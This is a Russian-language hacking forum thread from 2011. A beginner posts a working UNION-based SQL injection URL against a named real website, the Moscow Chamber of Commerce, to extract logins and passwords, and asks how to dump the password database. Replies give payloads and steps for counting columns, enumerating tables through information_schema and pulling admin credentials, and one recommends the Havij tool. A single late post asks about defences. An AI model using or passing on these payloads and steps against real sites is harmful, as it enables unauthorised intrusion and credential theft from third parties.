Помогите разобраться со SQL Инъекцией
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите разобраться со SQL Инъекцией - 2011-07-14 13:36:25.533333
|
|
|
Dr.HaHao_s
Сообщений: 17
Оценки: 0
Присоединился: 2010-08-15 14:17:31.673333
|
Собсно вот: Московская торгово-промышленная палата. ТИЦ 1600 PR 5
http://www.mostpp[это не я].ru/news.php?id=-5805+union+select+concat_ws(0x3a,login,pass)+ from+users+limit+0,1 Тут мы находим следующее:
<a href=/news.php?typ=[вывод]><b>Вернуться к общему списку сообщений</b></a>
В этом ещё новичок и не знаю как дальше выудить базу с паролями. Подскажите что за команды нужно писать.
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-15 21:13:21.530000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
5-ая ветка, в чем проблема? Вытаскивай все таблицы и ищи нужную.
table_name+from+information_schema.tables+limit+17,1
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-17 19:17:15.453333
|
|
|
Saw666
Сообщений: 98
Оценки: 20
Присоединился: 2011-07-17 11:56:43.250000
|
Скачиваешь программу Havij, а дальше все банально и просто хочешь сливай все, хочешь слей тока пароль админа. Действуй!
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-18 00:34:09.500000
|
|
|
Freeman0
Сообщений: 1
Оценки: 0
Присоединился: 2011-07-18 00:14:57.456666
|
ТС ещё даже кол-во колонок не подобрал.
Сначала подбираешь колонки, вот так:
http://www.mostpp.ru/news.php?id=-5805+union+select+1,2,3... То есть перечисляешь цифры через запятую, пока не пропадёт варнинг
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in Пропасть должен только этот, остальные - криворукость разработчиков.
После того, как подобрал колонки тащи названи таблиц через замену рабочей цифры на table_name и добавление в конец запроса from+information_schema.tables+limit+28,1
Увеличивая 28 на 1.
Дальше если найдёшь название таблицы с юзерами перебирай колонки (или пробуй распространённые - login, pass etc.) и тащи оттуда.
А вообще, перед тем, как задавать вопрос и тем более создавать тему, лучше воспользоваться поиском, в интернете огромное кол-во статей по SQL-inj.
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-18 00:56:26.573333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
ТС ещё даже кол-во колонок не подобрал.
Сначала подбираешь колонки, вот так:
ТС всё подобрал, одна колонка. Он написал даже где вывод, для особо слепых.
quote:
После того, как подобрал колонки тащи названи таблиц через замену рабочей цифры на table_name и добавление в конец запроса from+information_schema.tables+limit+28,1
А 18-ую таблицу "sbjbs_admin" лучше пропустить, ага?
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-18 20:31:29.160000
|
|
|
virtualcurier
Сообщений: 13
Оценки: 0
Присоединился: 2011-04-07 21:24:20.980000
|
Посоветуйте пжл одну из лучших защит интернет магазинa от атак хакерa.
|
|
|
|
|
RE: Помогите разобраться со SQL Инъекцией - 2011-07-19 10:09:57.493333
|
|
|
wekly
Сообщений: 505
Оценки: 0
Присоединился: 2011-07-08 14:35:05.483333
|
virtualcurier поищи в гугле там их очень много.
|
|
|
|
|
|
